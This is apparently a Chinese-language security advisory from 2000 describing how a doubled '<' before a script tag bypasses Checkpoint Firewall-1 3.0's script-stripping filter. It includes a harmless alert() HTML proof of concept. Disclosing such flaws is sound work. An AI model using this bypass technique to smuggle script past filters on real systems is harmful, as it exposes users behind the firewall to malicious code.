发布日期：2000-01-31
更新日期：2000-01-31

受影响系统：

Checkpoint Firewall-1 version 3.0

描述：

---

概要：

    通过在脚本的HTML标记前加上"<"，远程攻击者能绕过Checkpoint Firewall-1的脚本过滤机制。这样攻击者能够使连接到其站点的远程用户（如防火墙内的用户）执行任意的脚本代码（JavaScript、VBScript等），即使防火墙设置了过滤规则。

细节：

    如下代码能成功绕过FW-1的"Strip Script Tags"规则：

<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>

    以上代码将不会被过滤，并且仍能在浏览器中被执行。



建议：

---

    暂无。



浏览次数：6511
严重程度：0（网友投票）